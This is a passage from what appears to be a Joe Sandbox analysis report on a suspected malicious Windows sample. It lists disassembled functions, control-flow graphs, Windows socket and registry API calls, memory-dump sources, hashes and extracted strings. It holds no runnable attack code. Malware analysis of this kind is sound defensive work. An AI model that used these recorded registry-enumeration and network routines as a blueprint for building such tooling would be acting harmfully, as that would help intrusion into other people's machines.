30ad70-30ad78 1488->1495 1497 30ad04-30ad08 1490->1497 1498 30ac4c-30ac51 1490->1498 1492 30ac80-30ac9b 1491->1492 1493 30ace7-30acfe 1491->1493 1492->1493 1500 30ac9d-30acc1 1492->1500 1493->1497 1501 30ada0-30adb2 connect 1495->1501 1502 30ad7a-30ad7f 1495->1502 1497->1474 1503 30ad0a-30ad28 1497->1503 1498->1497 1504 30ac57-30ac78 1498->1504 1505 30acc6-30acd7 1500->1505 1507 30adb3-30adcf 1501->1507 1502->1501 1506 30ad81-30ad99 1502->1506 1503->1474 1503->1487 1504->1505 1505->1487 1513 30acdd-30ace5 1505->1513 1506->1507 1514 30add5-30add8 1507->1514 1515 30ae8a-30ae91 1507->1515 1513->1493 1513->1497 1516 30ade1-30adf1 1514->1516 1517 30adda-30addf 1514->1517 1515->1458 1518 30adf3-30ae07 1516->1518 1519 30ae0d-30ae12 1516->1519 1517->1495 1517->1516 1518->1519 1524 30aea8-30aead 1518->1524 1520 30ae14-30ae17 1519->1520 1521 30ae1a-30ae1c call 30af70 1519->1521 1520->1521 1525 30ae21-30ae23 1521->1525 1524->1458 1526 30ae93-30ae9d 1525->1526 1527 30ae25-30ae27 1525->1527 1528 30aeaf-30aeb1 call 2fe760 1526->1528 1529 30ae9f-30aea6 call 2fe7c0 1526->1529 1527->1458 1532 30aeb6-30aebe 1528->1532 1529->1532 1534 30aec0-30aedb call 2fe180 1532->1534 1535 30af1a-30af1f 1532->1535 1534->1458 1538 30aee1-30aeec 1534->1538 1535->1458 1539 30af02-30af06 1538->1539 1540 30aeee-30aeff 1538->1540 1541 30af08-30af0b 1539->1541 1542 30af0e-30af15 1539->1542 1540->1539 1541->1542 1542->1449
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0030AB9B
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0030ABE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID: ;z~$XLm$`Lm
                                                          • API String ID: 416004797-3316657296
                                                          • Opcode ID: 89f1138617673d542bd59724f88f9e7a19899f49a36a33bd51de05b5f709efb3
                                                          • Instruction ID: 93c0075bc0d41fc194fdbdc81d618fddfec36206ae3e9f2292ba6d9fda1fd04e
                                                          • Opcode Fuzzy Hash: 89f1138617673d542bd59724f88f9e7a19899f49a36a33bd51de05b5f709efb3
                                                          • Instruction Fuzzy Hash: 3AE1D0706057029BEB21CF24E8A5B6BB7E5EF85300F054A2CF9988B2D1E775D944CB92
                                                          Function 00242F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1544 242f17-242f8c call 6c98f0 call 6c9ce0 1549 2431c9-2431cd 1544->1549 1550 242f91-242ff4 call 241619 RegOpenKeyExA 1549->1550 1551 2431d3-2431d6 1549->1551 1554 2431c5 1550->1554 1555 242ffa-24300b 1550->1555 1554->1549 1556 24315c-2431ac RegEnumKeyExA 1555->1556 1557 243010-243083 call 241619 RegOpenKeyExA 1556->1557 1558 2431b2-2431c2 1556->1558 1562 24314e-243152 1557->1562 1563 243089-2430d4 RegQueryValueExA 1557->1563 1558->1554 1562->1556 1564 2430d6-243137 call 6c9bc0 call 6c9c50 call 6c9ce0 call 6c9af0 call 6c9ce0 call 6c8050 1563->1564 1565 24313b-24314b RegCloseKey 1563->1565 1564->1565 1565->1562
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: 810c604d4b1fea03e37e18b1dcf0e7d82b099612b8dd44aeee8d6dc75f633b06
                                                          • Instruction ID: 4143d70250c9e5ddc345a9c96516b263c94244fcf9f15c49b5d39902017e70a7
                                                          • Opcode Fuzzy Hash: 810c604d4b1fea03e37e18b1dcf0e7d82b099612b8dd44aeee8d6dc75f633b06
                                                          • Instruction Fuzzy Hash: CB7195B49143199FDB50DF69C98579EBBF0BF84308F10896DE49897301D7749A88CF92
                                                          Function 002476A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1578 2476a0-2476be 1579 2476e6-2476f2 send 1578->1579 1580 2476c0-2476c7 1578->1580 1581 2476f4-247709 call 2472a0 1579->1581 1582 24775e-247762 1579->1582 1580->1579 1583 2476c9-2476d1 1580->1583 1581->1582 1585 2476d3-2476e4 1583->1585 1586 24770b-247759 call 2472a0 call 24cb20 call 5c8c50 1583->1586 1585->1581 1586->1582
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,N=$,00000000,?,?,002507BF), ref: 002476EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$N=$$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-1652192185
                                                          • Opcode ID: b0818a76bb9eda513695f09820065f905279d19624cb4a8063a28d1e25819dab
                                                          • Instruction ID: 8b200467af48c9649f73b4ded0ec5e01d846bbe986d1d7c1a1e389a788411b80
                                                          • Opcode Fuzzy Hash: b0818a76bb9eda513695f09820065f905279d19624cb4a8063a28d1e25819dab
                                                          • Instruction Fuzzy Hash: C01127F17393057BE214AB189C9AE677B9CDBC2B28F450918FC1556242D2A19D10C6B1
                                                          Function 00279290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1788 279290-2792ed call 2476a0 1791 2793c3-2793ce 1788->1791 1792 2792f3-2792fb 1788->1792 1801 2793e5-279427 call 25d090 call 284f40 1791->1801 1802 2793d0-2793e1 1791->1802 1793 279301-279333 call 25d8c0 call 25d9a0 1792->1793 1794 2793aa-2793af 1792->1794 1813 2793a7 1793->1813 1814 279335-279364 WSAIoctl 1793->1814 1795 279456-279470 1794->1795 1796 2793b5-2793bc 1794->1796 1799 2793be 1796->1799 1800 279429-279431 1796->1800 1799->1795 1804 279433-279437 1800->1804 1805 279439-27943f 1800->1805 1801->1795 1801->1800 1802->1796 1806 2793e3 1802->1806 1804->1795 1804->1805 1805->1795 1809 279441-279453 call 2850a0 1805->1809 1806->1795 1809->1795 1813->1794 1817 279366-27936f 1814->1817 1818 27939b-2793a4 1814->1818 1817->1818 1820 279371-279390 setsockopt 1817->1820 1818->1813 1820->1818 1821 279392-279395 1820->1821 1821->1818
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0027935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00279389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: 7ea1a65fa57a50c7008af17af36898699490bfb2d7f905b0466c8fa32771c201
                                                          • Instruction ID: 9624c437d6c769152e9e7806c429e27a05faab3d7e322e362928d813adef63f2
                                                          • Opcode Fuzzy Hash: 7ea1a65fa57a50c7008af17af36898699490bfb2d7f905b0466c8fa32771c201
                                                          • Instruction Fuzzy Hash: C551C070610306ABDB14DF24C881FAAB7A5FF89314F14C569FD5C9B282E730E9A1CB91
                                                          Function 002F4950 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 170networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1822 2f4950-2f4964 1823 2f4966-2f4970 1822->1823 1824 2f4995-2f4999 1822->1824 1825 2f499b-2f499f 1823->1825 1826 2f4972-2f497d 1823->1826 1824->1825 1824->1826 1827 2f497f-2f498a 1825->1827 1828 2f49a1-2f49a5 1825->1828 1826->1827 1826->1828 1829 2f498c-2f4993 1827->1829 1830 2f49a7-2f49b7 call 2ff3a0 1827->1830 1828->1829 1828->1830 1829->1830 1833 2f49b9-2f49bf 1830->1833 1834 2f4a05-2f4a0e 1830->1834 1837 2f49c5-2f49c9 1833->1837 1838 2f4a74-2f4a82 1833->1838 1835 2f4b26-2f4b2d 1834->1835 1836 2f4a14-2f4a43 call 2fb590 1834->1836 1836->1835 1858 2f4a49-2f4a67 call 2fbbe0 call 2febf0 1836->1858 1839 2f49cf-2f49d5 1837->1839 1840 2f4ad9-2f4ae6 1837->1840 1849 2f4b2e-2f4b33 1838->1849 1850 2f4a88-2f4a92 1838->1850 1842 2f4aec-2f4b0c call 3078a0 1839->1842 1843 2f49db-2f49df 1839->1843 1840->1842 1840->1843 1847 2f49e5-2f49fa 1842->1847 1848 2f4b12-2f4b14 1842->1848 1843->1847 1843->1848 1854 2f4b16-2f4b23 1847->1854 1855 2f4a00 1847->1855 1848->1835 1848->1854 1849->1835 1851 2f4aa0-2f4aad gethostname 1850->1851 1856 2f4b35-2f4b37 1851->1856 1857 2f4ab3-2f4abe 1851->1857 1854->1835 1855->1835 1859 2f4b3c-2f4b49 call 5c8d90 1856->1859 1860 2f4b39 1856->1860 1857->1860 1866 2f4ac0-2f4ad2 1857->1866 1858->1833 1872 2f4a6d-2f4a6f 1858->1872 1859->1837 1869 2f4b4f-2f4b69 1859->1869 1860->1859 1866->1851 1873 2f4ad4 1866->1873 1869->1854 1876 2f4b6b-2f4b80 call 3078a0 1869->1876 1872->1835 1875 2f4b8e-2f4b93 1873->1875 1875->1854 1876->1875 1879 2f4b82-2f4b89 1876->1879 1879->1837
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 002F4AA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID: XLm$\Lm$`Lm
                                                          • API String ID: 144339138-141128817
                                                          • Opcode ID: d3238f49e478502ce60df3251118e1140e3c01c2e4f990b22ccf4c7a15e80e2d
                                                          • Instruction ID: c38f437253d4a66f8111b01bc60d9d45312a2d291816af468d0ef9aded5b68a0
                                                          • Opcode Fuzzy Hash: d3238f49e478502ce60df3251118e1140e3c01c2e4f990b22ccf4c7a15e80e2d
                                                          • Instruction Fuzzy Hash: CE51D370A2430A8BE731AF25DD49733B6D4AF41399F04093DEB8A866D2E7F5E864C701
                                                          Function 00247770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1880 247770-24778e 1881 2477b6-2477c2 recv 1880->1881 1882 247790-247797 1880->1882 1884 2477c4-2477d9 call 2472a0 1881->1884 1885 24782e-247832 1881->1885 1882->1881 1883 247799-2477a1 1882->1883 1886 2477a3-2477b4 1883->1886 1887 2477db-247829 call 2472a0 call 24cb20 call 5c8c50 1883->1887 1884->1885 1886->1884 1887->1885
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: a3c2cd557272d149e4e23951ccfe8d253d4f6adcfa1e70d3159918ecb6ffdeae
                                                          • Instruction ID: 0359796c5b17ca66cdf42266bab06aa331a6b40324ecd1e14a46a00b4c2ecd53
                                                          • Opcode Fuzzy Hash: a3c2cd557272d149e4e23951ccfe8d253d4f6adcfa1e70d3159918ecb6ffdeae
                                                          • Instruction Fuzzy Hash: 821127F4B393047BE1249B249C4AE67BB9CDBC6F68F444928F81493242D7619D10C5F1
                                                          Function 002475E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1899 2475e0-2475ed 1900 247607-247629 socket 1899->1900 1901 2475ef-2475f6 1899->1901 1903 24763f-247642 1900->1903 1904 24762b-24763c call 2472a0 1900->1904 1901->1900 1902 2475f8-2475ff 1901->1902 1905 247601-247602 1902->1905 1906 247643-247699 call 2472a0 call 24cb20 call 5c8c50 1902->1906 1904->1903 1905->1900
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: 7bef54a410fa783fc43942c7e8af83f2fa722111d25cb80205e4aae3262c8b79
                                                          • Instruction ID: 36739f408deef961fa39786264094feb2593266c388bffe18bbf7dce0f6d87b9
                                                          • Opcode Fuzzy Hash: 7bef54a410fa783fc43942c7e8af83f2fa722111d25cb80205e4aae3262c8b79
                                                          • Instruction Fuzzy Hash: B21188B2B2421237E6109F2CAC1AFDB3F9DDF81B24F054924F820962A2D322CD64D6D1
                                                          Function 0027A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1917 27a150-27a159 1918 27a250 1917->1918 1919 27a15f-27a17b 1917->1919 1920 27a181-27a1ce getsockname 1919->1920 1921 27a249-27a24f 1919->1921 1922 27a1f7-27a214 call 27ef30 1920->1922 1923 27a1d0-27a1f5 call 25d090 1920->1923 1921->1918 1922->1921 1928 27a216-27a23b call 25d090 1922->1928 1930 27a240-27a246 call 284f40 1923->1930 1928->1930 1930->1921
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0027A1C7
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0027A23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 0027A1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
